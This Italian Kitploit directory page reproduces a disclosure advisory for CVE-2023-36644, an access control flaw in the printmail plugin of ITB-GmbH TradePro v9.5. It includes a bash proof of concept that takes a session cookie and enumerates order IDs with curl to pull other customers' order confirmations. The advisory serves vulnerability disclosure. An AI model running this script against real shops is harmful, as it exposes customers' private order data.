Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-36644 | Kitploit
Strumenti/GitHubGitHub/caffeinated-labs/cve-2023-36644
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubcaffeinated-labs/cve-2023-36644

CVE-2023-36644

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

== Software interessato [%hardbreaks] Fornitore: ITB-GmbH Prodotti interessati: TradePro (v9.5) Componente: Printmail Plugin Confermato: sì

== Vettore d'attacco [%hardbreaks] Tipo: Controllo di accesso errato Tipo di accesso: Remoto Impatto: Divulgazione di informazioni

Il controllo di accesso errato nel plugin printmail in ITB-GmbH TradePro v9.5 consente ad attaccanti remoti di ricevere tutte le conferme d'ordine dal negozio online passando numeri d'ordine arbitrari a un endpoint http(s).

== Descrizione Il orderid dovrebbe essere noto in anticipo ma può essere enumerato facilmente o utilizzando un SQLi (vedi Report link:/security/CVE-2023-36645[CVE-2023-36645])

Chiamando http(s)://[DOMAIN]/shop/de/?plugin=printmail&wkid=[COOKIE]&orderid=[ORDER_ID] con un cookie di sessione valido ma non autenticato, l'attaccante ottiene accesso a tutte le conferme d'ordine.

== CVSS [%hardbreaks] Punteggio: 7.1 Vettore: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P[CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P]

== PoC [source, bash]

#! /bin/bash DOMAIN=$1 TEST_PATH="shop/de/sys/" #TEST_PATH="shop/de/" SAMPLE1_ID=0

COOKIE=$(curl -s -c - $DOMAIN | grep sessiontradepro | cut -f7) echo "Got Cookie: $COOKIE" SAMPLE1=$(curl -s -w '\nsize_download %{size_download}' "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=$SAMPLE1_ID" | grep size_download | cut -d" " -f2) echo Test URL: "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=%ID%" echo "========" echo $SAMPLE1_ID $SAMPLE1 for SAMPLE2_ID in {24000..25000} do SAMPLE2=$(curl -s -w '\nsize_download %{size_download}' "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=$SAMPLE2_ID" | grep size_download | cut -d" " -f2) echo $SAMPLE2_ID $SAMPLE2 done

== Crediti

  • Lynn
  • Jadyn
  • https://zerforschung.org[zerforschung.org]
Scarica lo strumento